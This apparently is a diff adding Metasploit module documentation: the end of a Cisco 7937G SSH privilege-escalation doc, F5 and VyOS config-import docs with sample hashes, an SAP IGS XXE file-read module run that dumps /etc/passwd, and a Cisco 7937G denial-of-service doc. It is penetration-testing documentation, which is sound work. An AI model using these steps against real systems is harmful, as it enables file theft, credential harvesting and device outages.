+fxShow - Display file transfer manager status
+utilHostByNameShow - Test utilHostByName
+utilDnsShow - Show callbacks for dns queries
+dnsCacheShow - Show DNSACacheShow
+utilEthLinkShow - Show Ethernet link status
+ethConfigTest - Set Ethernet Mode (0 to 4)
+timeTest - Test time
+contrastChg - Change LCD Contrast
+setAdminVlan - Set admin vlan id
+setL2Auth - Set L2 Auth Enable/Disable
+ipAddrChange - Change ip addr configuration
+
+Commands 81 to 101:
+tftpChange - Change tftp addr
+arpStats - Print ARP statistics
+fxPut - Transfer file to remote
+crash - Crash the system
+ipAddrShow - Show ip addr
+rtosSocketShow - Show rtos socket information
+sccpShow - Show protocol
+regManagerShow - show registration manager state
+uiPrintAll - uiPrintAll
+uiPrintSoftKeys - uiPrintSoftKeys
+getVoiceQuality - displays voice quality control status
+uiPrintLocalSoftKeys - uiPrintLocalSoftKeys
+uiStartTone - uiStartTone
+uiStopTone - uiStopTone
+pegPrintAll - pegPrintAll
+uiSMPrintAll - uiStateMachinePrintAll
+lldpSMPrintAll - lldpStateMachinePrintAll
+saveLogLevels - saveLogLevels
+localePrintAll - localePrintAll
+ceShow - Show Client Engine Status
+
+Commands 101 to 121:
+udiShow - Show Unique Device Indentifier
+show - Show Unique Device Indentifier
+pbnShow - Display app & bootrom headers
+upr - Upgrade to a Rockpile Standalone Image
+upm - Upgrade to a Rockpile Manf Image
+setHw - Sets the Rockpile Hardware Id
+getHw - Prints the Rockpile Hardware Id
+setUpf - Sets the Upgrade progress flag
+rstUpf - Resets the Upgrade progress flag
+setMdm - Sets the Manf diag mode flag
+rstMdm - Resets the Manf diag mode flag
+setDhcp - Sets the Manf diag dhcp flag
+rstDhcp - Resets the Manf diag  dhcp flag
+setOrd - Sets the ORD flag
+rstOrd - Resets the ORD flag
+fs - Prin the status of rockpile flags
+cp - Mfg. test diags
+vol - Mfg. test diags
+sig - Mfg. test diags
+os - Mfg. test diags
+
+Commands 121 to 141:
+lcd - Mfg. test diags
+sum - Prints checksums of flash images
+rd - Mfg. test diags
+wr - Mfg. test diags
+eth - Start/stop ethernet hardware
+fstp - Stop FGPIO interface
+hfTxEq - Audio testing for large conf rooms
+ctConv - perform ct convergence test.
+ctModeEnd - terminate ctMode
+ctEnableRx - Enable ctRx 1 on, 0 off
+ctEnableTx - Enable ctTx 1 on, 0 off
+ctMicTx - Route mic # to Tx
+ctEMTx - Route external mic # to Tx
+ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctRxSpkr - Send directly to HF speaker
+ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm)
+ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm)
+displayListeningPorts - Display listening port and process info 
+killListeningProcess - Kill the task associated with the port
+
+$>exit
+```
+
+#### Unsuccessful Scenario
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,525 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports an F5 configuration file into the database.
+This is similar to `post/networking/gather/enum_f5` only access isn't required,
+and assumes you already have the file.
+
+### Example Config
+
+```
+#TMSH-VERSION: 15.1.0.2
+
+cm cert /Common/dtca-bundle.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca-bundle.crt_62970_3
+    checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
+    revision 3
+}
+cm cert /Common/dtca.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtca.crt_62966_3
+    checksum SHA1:1310:d1e052507e0ec1a274848374ff904ae8548d7dd2
+    revision 3
+}
+cm cert /Common/dtdi.crt {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_d/:Common:dtdi.crt_62962_3
+    checksum SHA1:1285:0f4ddae3808474c70911f43725c7cfdb46aa4430
+    revision 3
+}
+cm device /Common/f5bigip.home.com {
+    active-modules { "BIG-IP, VE Trial|VTFLRXF-LFSIQYY|Rate Shaping|External Interface and Network HSM, VE|SDN Services, VE|SSL, Forward Proxy, VE|BIG-IP VE, Multicast Routing|APM, Limited|SSL, VE|DNS (1K QPS), VE|Routing Bundle, VE|ASM, VE|Crytpo Offload, VE, Tier 1 (25M - 200M)|Max Compression, VE|AFM, VE|DNSSEC|Anti-Virus Checks|Base Endpoint Security Checks|Firewall Checks|Network Access|Secure Virtual Keyboard|APM, Web Application|Machine Certificate Checks|Protected Workspace|Remote Desktop|App Tunnel|VE, Carrier Grade NAT (AFM ONLY)|PSM, VE" }
+    base-mac aa:aa:aa:aa:aa:aa
+    build 0.0.9
+    cert /Common/dtdi.crt
+    chassis-id 564dcf79-53ce-3494-3217671849c7
+    configsync-ip 10.10.10.222
+    edition "Point Release 2"
+    hostname f5bigip.home.com
+    key /Common/dtdi.key
+    management-ip 2.2.2.2
+    marketing-name "BIG-IP Virtual Edition"
+    platform-id Z100
+    product BIG-IP
+    self-device true
+    time-zone America/Los_Angeles
+    version 15.1.0.2
+}
+cm device-group /Common/device_trust_group {
+    auto-sync enabled
+    devices {
+        /Common/f5bigip.home.com { }
+    }
+    hidden true
+    network-failover disabled
+}
+cm device-group /Common/gtm {
+    devices {
+        /Common/f5bigip.home.com { }
+    }
+    hidden true
+    network-failover disabled
+}
+cm key /Common/dtca.key {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtca.key_62968_3
+    checksum SHA1:1704:f274958ad619b0c70d8ccc4f7c5ae199061464e6
+    revision 3
+}
+cm key /Common/dtdi.key {
+    cache-path /config/filestore/files_d/Common_d/trust_certificate_key_d/:Common:dtdi.key_62964_3
+    checksum SHA1:1704:97eeb5aedee76b3c21e6d735604a092e830ef6c2
+    revision 3
+}
+cm traffic-group /Common/traffic-group-1 {
+    unit-id 1
+}
+cm traffic-group /Common/traffic-group-local-only { }
+cm trust-domain /Common/Root {
+    ca-cert /Common/dtca.crt
+    ca-cert-bundle /Common/dtca-bundle.crt
+    ca-devices { /Common/f5bigip.home.com }
+    ca-key /Common/dtca.key
+    guid fe0ee274-0355-4940-acc7000c291849c7
+    status standalone
+    trust-group /Common/device_trust_group
+}
+net interface 1.1 {
+    media-fixed 10000T-FD
+}
+net interface 1.2 {
+    media-fixed 10000T-FD
+}
+net interface 1.3 {
+    media-fixed 10000T-FD
+}
+net port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+net port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+net route-domain /Common/0 {
+    id 0
+    vlans {
+        /Common/http-tunnel
+        /Common/socks-tunnel
+        /Common/internal
+    }
+}
+net self /Common/10.10.10.223 {
+    address 10.10.10.223/8
+    allow-service {
+        default
+    }
+    traffic-group /Common/traffic-group-1
+    vlan /Common/internal
+}
+net self /Common/10.10.10.222 {
+    address 10.10.10.222/8
+    allow-service {
+        default
+    }
+    traffic-group /Common/traffic-group-local-only
+    vlan /Common/internal
+}
+net self-allow {
+    defaults {
+        igmp:0
+        ospf:0
+        pim:0
+        tcp:161
+        tcp:22
+        tcp:4353
+        tcp:443
+        tcp:53
+        udp:1026
+        udp:161
+        udp:4353
+        udp:520
+        udp:53
+    }
+}
+net stp /Common/cist { }
+net vlan /Common/internal {
+    tag 4094
+}
+net fdb tunnel /Common/http-tunnel { }
+net fdb tunnel /Common/socks-tunnel { }
+net fdb vlan /Common/internal { }
+net tunnels tunnel /Common/http-tunnel {
+    description "Tunnel for http-explicit profile"
+    profile /Common/tcp-forward
+}
+net tunnels tunnel /Common/socks-tunnel {
+    description "Tunnel for socks profile"
+    profile /Common/tcp-forward
+}
+security device-id attribute /Common/att01 {
+    id 1
+}
+security device-id attribute /Common/att02 {
+    id 2
+}
+security device-id attribute /Common/att03 {
+    id 3
+}
+security device-id attribute /Common/att04 {
+    id 4
+}
+security device-id attribute /Common/att05 {
+    id 5
+}
+security device-id attribute /Common/att06 {
+    id 6
+}
+security device-id attribute /Common/att07 {
+    id 7
+}
+security device-id attribute /Common/att08 {
+    id 8
+}
+security device-id attribute /Common/att09 {
+    id 9
+}
+security device-id attribute /Common/att10 {
+    id 10
+}
+security device-id attribute /Common/att11 {
+    id 11
+}
+security device-id attribute /Common/att12 {
+    id 12
+}
+security device-id attribute /Common/att13 {
+    id 13
+}
+security device-id attribute /Common/att14 {
+    id 14
+}
+security device-id attribute /Common/att15 {
+    id 15
+}
+security device-id attribute /Common/att16 {
+    id 16
+}
+security device-id attribute /Common/att17 {
+    id 17
+}
+security device-id attribute /Common/att18 {
+    id 18
+}
+security device-id attribute /Common/att19 {
+    id 19
+}
+security device-id attribute /Common/att20 {
+    id 20
+}
+security device-id attribute /Common/att21 {
+    id 21
+}
+security device-id attribute /Common/att22 {
+    id 22
+}
+security device-id attribute /Common/att23 {
+    id 23
+}
+security device-id attribute /Common/att24 {
+    id 24
+}
+security device-id attribute /Common/att25 {
+    id 25
+}
+security device-id attribute /Common/att26 {
+    id 26
+}
+security device-id attribute /Common/att27 {
+    id 27
+}
+security device-id attribute /Common/att28 {
+    id 28
+}
+security device-id attribute /Common/att29 {
+    id 29
+}
+security device-id attribute /Common/att30 {
+    id 30
+}
+security device-id attribute /Common/att31 {
+    id 31
+}
+security device-id attribute /Common/att32 {
+    id 32
+}
+security device-id attribute /Common/att33 {
+    id 33
+}
+security device-id attribute /Common/att34 {
+    id 34
+}
+security device-id attribute /Common/att35 {
+    id 35
+}
+security device-id attribute /Common/att36 {
+    id 36
+}
+security device-id attribute /Common/att37 {
+    id 37
+}
+security device-id attribute /Common/att38 {
+    id 38
+}
+security device-id attribute /Common/att39 {
+    id 39
+}
+security firewall config-entity-id /Common/uuid_entity_id {
+    entity-id 3346813779321352940
+}
+security firewall port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+security firewall port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_all {
+    rules {
+        _sys_allow_all {
+            action accept
+            ip-protocol any
+        }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_defaults {
+    rules {
+        _sys_allow_tcp_defaults {
+            action accept
+            ip-protocol tcp
+            destination {
+                port-lists {
+                    /Common/_sys_self_allow_tcp_defaults
+                }
+            }
+        }
+        _sys_allow_udp_defaults {
+            action accept
+            ip-protocol udp
+            destination {
+                port-lists {
+                    /Common/_sys_self_allow_udp_defaults
+                }
+            }
+        }
+        _sys_allow_ospf_defaults {
+            action accept
+            ip-protocol ospf
+        }
+        _sys_allow_pim_defaults {
+            action accept
+            ip-protocol pim
+        }
+        _sys_allow_igmp_defaults {
+            action accept
+            ip-protocol igmp
+        }
+    }
+}
+security firewall rule-list /Common/_sys_self_allow_management {
+    rules {
+        _sys_allow_ssh {
+            action accept
+            ip-protocol tcp
+            destination {
+                ports {
+                    22 { }
+                }
+            }
+        }
+        _sys_allow_web {
+            action accept
+            ip-protocol tcp
+            destination {
+                ports {
+                    443 { }
+                }
+            }
+        }
+    }
+}
+security ip-intelligence policy /Common/ip-intelligence { }
+security shared-objects port-list /Common/_sys_self_allow_tcp_defaults {
+    ports {
+        22 { }
+        53 { }
+        161 { }
+        443 { }
+        1029-1043 { }
+        4353 { }
+    }
+}
+security shared-objects port-list /Common/_sys_self_allow_udp_defaults {
+    ports {
+        53 { }
+        161 { }
+        520 { }
+        1026 { }
+        4353 { }
+    }
+}
+sys dns {
+    description configured-by-dhcp
+    name-servers { 192.168.2.40 9.9.9.9 }
+    search { ragedomain }
+}
+sys folder / {
+    device-group none
+    hidden false
+    inherited-devicegroup false
+    inherited-traffic-group false
+    traffic-group /Common/traffic-group-1
+}
+sys folder /Common {
+    device-group none
+    hidden false
+    inherited-devicegroup true
+    inherited-traffic-group true
+    traffic-group /Common/traffic-group-1
+}
+sys folder /Common/Drafts {
+    device-group none
+    hidden false
+    inherited-devicegroup true
+    inherited-traffic-group true
+    traffic-group /Common/traffic-group-1
+}
+sys global-settings {
+    hostname f5bigip.home.com
+}
+sys management-dhcp /Common/sys-mgmt-dhcp-config {
+    request-options { subnet-mask broadcast-address routers domain-name domain-name-servers host-name ntp-servers interface-mtu }
+}
+sys provision ltm {
+    level nominal
+}
+sys snmp {
+    agent-addresses { tcp6:161 udp6:161 }
+    communities {
+        /Common/comm-public {
+            community-name public
+            source default
+        }
+    }
+    disk-monitors {
+        /Common/root {
+            minspace 2000
+            path /
+        }
+        /Common/var {
+            minspace 10000
+            path /var
+        }
+    }
+    process-monitors {
+        /Common/bigd {
+            max-processes infinity
+            process bigd
+        }
+        /Common/chmand {
+            process chmand
+        }
+        /Common/httpd {
+            max-processes infinity
+            process httpd
+        }
+        /Common/mcpd {
+            process mcpd
+        }
+        /Common/sod {
+            process sod
+        }
+        /Common/tmm {
+            max-processes infinity
+            process tmm
+        }
+    }
+}
+sys dynad settings {
+    development-mode false
+}
+sys fpga firmware-config {
+    type standard-balanced-fpga
+}
+sys sflow global-settings http { }
+sys sflow global-settings vlan { }
+sys turboflex profile-config {
+    type turboflex-adc
+}
+```
+
+## Verification Steps
+
+1. Have an F5 configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/f5_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+## Scenarios
+
+### F5 Big-IP 15.1.0.2 (virtual on ESXi)
+
+```
+resource (f5.rb)> use auxiliary/admin/networking/f5_config
+resource (f5.rb)> set config /home/h00die/Downloads/f5_config.txt
+config => /home/h00die/Downloads/f5_config.txt
+resource (f5.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (f5.rb)> set verbose true
+verbose => true
+resource (f5.rb)> run
+[*] Running module against 127.0.0.1
+[*] Importing config
+[+] 127.0.0.1:22 SNMP Community 'public' with RO access
+[+] 127.0.0.1:22 Hostname: f5bigip.home.com
+[+] 127.0.0.1:22 MAC Address: aa:aa:aa:aa:aa:aa
+[+] 127.0.0.1:22 Management IP: 2.2.2.2
+[+] 127.0.0.1:22 Product BIG-IP
+[+] 127.0.0.1:22 OS Version: 15.1.0.2
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
@@ -0,0 +1,223 @@
+## Vulnerable Application
+
+### General Notes
+
+This module imports a VyOS configuration file into the database.
+This is similar to `post/networking/gather/enum_vyos` only access isn't required,
+and assumes you already have the file.
+
+VyOS is available to download from [VyOS.io](https://downloads.vyos.io/).
+
+Example config file:
+
+#### VyOS 1.3
+
+```
+interfaces {
+    ethernet eth0 {
+        address 10.10.10.10/24
+        description "desc two"
+        hw-id 00:0c:29:ab:ce:16
+    }
+    ethernet eth1 {
+        hw-id 00:0c:29:ab:ce:20
+    }
+    loopback lo {
+    }
+}
+service {
+    snmp {
+        community ro {
+            authorization ro
+        }
+        community write {
+            authorization rw
+        }
+    }
+}
+system {
+    config-management {
+        commit-revisions 100
+    }
+    console {
+        device ttyS0 {
+            speed 115200
+        }
+    }
+    host-name vyos
+    login {
+        user vyos {
+            authentication {
+                encrypted-password $6$km/6j4hX0Ayo$dk2z5LeUOayHopgLGZJII0whBMidnvsd4LfT6LcIcR9ReabX0kcXjZOlmmqDGWuo1FvpnV.X2IRl5NeEZpuI31
+                plaintext-password ""
+            }
+        }
+    }
+    ntp {
+        server 0.pool.ntp.org {
+        }
+        server 1.pool.ntp.org {
+        }
+        server 2.pool.ntp.org {
+        }
+    }
+    syslog {
+        global {
+            facility all {
+                level info
+            }
+            facility protocols {
+                level debug
+            }
+        }
+    }
+}
+// Warning: Do not remove the following line.
+// vyos-config-version: "broadcast-relay@1:cluster@1:config-management@1:conntrack@1:conntrack-sync@1:dhcp-relay@2:dhcp-server@5:dhcpv6-server@1:dns-forwarding@3:firewall@5:https@2:interfaces@12:ipoe-server@1:ipsec@5:l2tp@3:lldp@1:mdns@1:nat@5:ntp@1:pppoe-server@4:pptp@2:qos@1:quagga@6:salt@1:snmp@2:ssh@2:sstp@2:system@18:vrrp@2:vyos-accel-ppp@2:wanloadbalance@3:webgui@1:webproxy@2:zone-policy@1"
+// Release version: 1.3-rolling-202008270118
+```
+
+#### VyOS 1.1.8
+```
+interfaces {
+    ethernet eth0 {
+        description "eth0 main"
+        duplex auto
+        hw-id 00:0c:29:f4:45:0a
+        smp_affinity auto
+        speed auto
+        vif 90 {
+            address dhcp
+        }
+    }
+    ethernet eth1 {
+        address 10.10.10.10/24
+        duplex auto
+        hw-id 00:0c:29:f4:45:14
+        smp_affinity auto
+        speed auto
+    }
+    loopback lo {
+    }
+}
+service {
+    snmp {
+        community ro {
+            authorization ro
+        }
+        community write {
+            authorization rw
+        }
+    }
+}
+system {
+    config-management {
+        commit-revisions 20
+    }
+    console {
+    }
+    host-name vyos118
+    login {
+        user jsmith {
+            authentication {
+                encrypted-password $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
+                plaintext-password ""
+            }
+            full-name "john smith"
+            level operator
+        }
+        user vyos {
+            authentication {
+                encrypted-password $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
+                plaintext-password ""
+            }
+            level admin
+        }
+    }
+    ntp {
+        server 0.pool.ntp.org {
+        }
+        server 1.pool.ntp.org {
+        }
+        server 2.pool.ntp.org {
+        }
+    }
+    package {
+        auto-sync 1
+        repository community {
+            components main
+            distribution helium
+            password ""
+            url http://packages.vyos.net/vyos
+            username ""
+        }
+    }
+    syslog {
+        global {
+            facility all {
+                level notice
+            }
+            facility protocols {
+                level debug
+            }
+        }
+    }
+    time-zone UTC
+}
+
+
+/* Warning: Do not remove the following line. */
+/* === vyatta-config-version: "cluster@1:config-management@1:conntrack-sync@1:conntrack@1:cron@1:dhcp-relay@1:dhcp-server@4:firewall@5:ipsec@4:nat@4:qos@1:quagga@2:system@6:vrrp@1:wanloadbalance@3:webgui@1:webproxy@1:zone-policy@1" === */
+/* Release version: VyOS 1.1.8 */
+```
+
+## Verification Steps
+
+1. Have a VyOS configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/vyos_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+## Scenarios
+
+### VyOS 1.1.8
+
+```
+msf6 > use auxiliary/admin/networking/vyos_config 
+msf6 auxiliary(admin/networking/vyos_config) > set config /tmp/vyos.config
+config => /tmp/vyos.config
+msf6 auxiliary(admin/networking/vyos_config) > set verbose true
+verbose => true
+msf6 auxiliary(admin/networking/vyos_config) > run
+[-] Auxiliary failed: Msf::OptionValidateError One or more options failed to validate: RHOSTS.
+msf6 auxiliary(admin/networking/vyos_config) > set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+msf6 auxiliary(admin/networking/vyos_config) > run
+[*] Running module against 1.1.1.1
+
+[*] Importing config
+[+] Config saved to: /home/h00die/.msf4/loot/20200920154519_default_1.1.1.1_vyos.config_295168.txt
+[+] 1.1.1.1:22 Username 'jsmith' with level 'operator' with hash $6$b/9HkzK14DtQm3W$UL5z9yGDoX8j13meRLFEGYkn8popOtCa91wwg8qxOFIfQcWBuXQDDiy8NhdPhpnYieBykj1ddytJAwU6C4mrH1
+[+] 1.1.1.1:22 Username 'vyos' with level 'admin' with hash $1$hTBP1zOx$M0WnYPshI2piRc7.XnwBU0
+[+] 1.1.1.1:22 SNMP Community 'ro' with ro access
+[+] 1.1.1.1:22 SNMP Community 'write' with rw access
+[+] 1.1.1.1:22 Hostname: vyos118
+[+] 1.1.1.1:22 OS Version: VyOS 1.1.8
+[+] 1.1.1.1:22 Interface eth1 (00:0c:29:f4:45:14) - 10.10.10.10
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+
+
@@ -0,0 +1,168 @@
+## Vulnerable Application
+This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page
+of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These
+vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when
+submitting a POST request to the XMLCHART page to generate a new chart.
+
+Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user
+from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers
+can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable
+SAP IGS server.
+
+### Application Background
+The Internet Graphics Service (IGS) where it provides a way infrastructure to enable developers to display graphics
+in an internet browser with minimal effort. It has been integrated in several different SAP UI technologies
+where it provides a way for data from another SAP system or data source to be utilized to generate
+dynamic graphical or non-graphical output.
+
+### Installation Steps
+Steps to install and update the SAP IGS server can be found online on [this page][2].
+Additional information on configuring the IGS server can be found [here][3].
+Finally information on administering the IGS server can be found [here][4].
+
+Once set up and configured, the instances will be vulnerable on the default HTTP port 40080.
+
+## Verification Steps
+
+  1. Start msfconsole
+  1. Do: `workspace [WORKSPACE]`
+  1. Do: `use auxiliary/admin/sap/sap_igs_xmlchart_xxe`
+  1. Do: `set RHOSTS [IP]`
+  1. Do: `set FILE [remote file name]`
+  1. Do: `set action READ`
+  1. Do: `check`
+  1. Verify that the `check` method correctly identifies if the target is vulnerable or not.
+  1. Do: `run`
+  1. Verify that the contents of the file you specified were returned.
+
+## Options
+
+### FILE
+
+File to read from the remote server. Example: `/etc/passwd`
+
+### URIPATH
+
+This is the path to the XMLCHART page of the SAP IGS server that is vulnerable to XXE.
+By default it is set to `/XMLCHART`, however it can be changed if the SAP IGS server
+was installed under a different path than the web root. For example if the SAP IGS
+server was installed to the `/igs/` path under the web root, then this value would be
+set to `/igs/XMLCHART`.
+
+## Actions
+```
+   Name  Description
+   ----  -----------
+   READ  Remote file read
+   DOS   Denial Of Service
+```
+
+## Scenarios
+
+### Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1
+
+```
+msf6 > workspace -a SAP_TEST
+[*] Added workspace: SAP_TEST
+[*] Workspace: SAP_TEST
+msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
+RHOSTS => 172.16.30.29
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
+FILE => /etc/passwd
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
+action => READ
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
+Proxies => http:127.0.0.1:8080
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options
+
+Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
+
+   Name     Current Setting      Required  Description
+   ----     ---------------      --------  -----------
+   FILE     /etc/passwd          no        File to read from the remote server
+   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    40080                yes       The target port (TCP)
+   SSL      false                no        Negotiate SSL/TLS for outgoing connections
+   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
+   VHOST                         no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   READ  Remote file read
+
+
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
+[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
+[*] Running module against 172.16.30.29
+
+[+] File: /etc/passwd content from host: 172.16.30.29
+at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
+bin:x:1:1:bin:/bin:/bin/bash
+daemon:x:2:2:Daemon:/sbin:/bin/bash
+ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
+games:x:12:100:Games account:/var/games:/bin/bash
+gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
+haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
+lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
+mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
+man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
+messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
+news:x:9:13:News system:/etc/news:/bin/bash
+nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
+ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
+polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
+postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
+pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
+puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
+root:x:0:0:root:/root:/bin/bash
+sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
+suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
+uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
+uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
+wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
+admin:x:1000:100:admin:/home/admin:/bin/bash
+j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
+sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
+sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
+[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
+Services
+========
+
+host          port   proto  name  state  info
+----          ----   -----  ----  -----  ----
+172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)
+
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns
+
+Vulnerabilities
+===============
+
+Timestamp                Host          Name                                             References
+---------                ----          ----                                             ----------
+2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
+
+msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot
+
+Loot
+====
+
+host          service  type              name         content     info                  path
+----          -------  ----              ----         -------     ----                  ----
+172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
+
+```
+
+[1]: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
+[2]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e193dbeb5c617e2e10000000a42189b.html
+[3]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e1939c9b5c617e2e10000000a42189b.html
+[4]: https://help.sap.com/viewer/3348e831f4024f2db0251e9daa08b783/7.5.16/en-US/4e193988b5c617e2e10000000a42189b.html
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a bug in how the conference station handles incoming SSH
+  connections that provide an incompatible key exchange. By connecting with an
+  incompatible key exchange, the device becomes nonresponsive until it is manually power cycled.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable SSH Access on the device.
+  3. Start msfconsole
+  4. Do: `use auxiliary/dos/cisco/cisco_7937G_dos`
+  5. Do: `set RHOST 192.168.1.10`
+  6. Do: `run`
+  7. The conference station should now be nonresponsive until it is power cycled
+
+## Options
+
+  No options
+
+## Scenarios
+
